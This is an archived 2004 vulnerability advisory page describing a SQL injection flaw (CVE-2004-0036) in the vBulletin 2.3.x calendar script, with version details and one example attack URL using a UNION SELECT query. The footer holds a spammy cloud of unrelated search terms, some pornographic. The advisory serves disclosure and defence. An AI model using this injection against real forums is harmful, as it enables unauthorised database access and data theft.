about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , vBulletin Calendar Script SQL Injection Vulnerability


Title vBulletin Calendar Script SQL Injection Vulnerability
Published 2004-01-05-12:00AM
Updated 2004-01-07-03:20PM
Class Input Validation Error
CVE   CVE-2004-0036
Remote  Yes
Local  No
Credit  Discovery is credit to mslug.
Vulnerable  VBulletin VBulletin 2.3.3
VBulletin VBulletin 2.3.2
VBulletin VBulletin 2.3 .0
Not Vulnerable  VBulletin VBulletin 2.3.4
Code   The following example was provided:

http://www.example.com/[software_installation_path]/calendar.php?s=&action=edit&eventid=14 union (SELECT
allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events
WHERE eventid = 14) order by eventdate

(it should be noted that the underlying database must support the UNION command for this example to work)
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 21:03:58 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
sex picte Indian se joomla rem Gym class www.gigaga free porn dog vidio AISHWARYA moekyashwe Punjab.sex grandtheft Sexyangom mambo Remo Sextoon.co kuspoosex sexgays www.myinda /search/ex www.it197. VIDEOW Www.photor directory blade serv NES file g www.it197. exploit re afpovertcp www.wangyu www.wazjj. 200 /compo 2.6.15-26- d-link ssh porn pics vBadvance php-nuke 2 tomcat 4.1 www.taobao Www.sexara SEX PECTSH avizan.com Crack Data uc.snowbai Crack+Data www.chengs download v memht port icewarp we CMS is Fre news for c algeria.se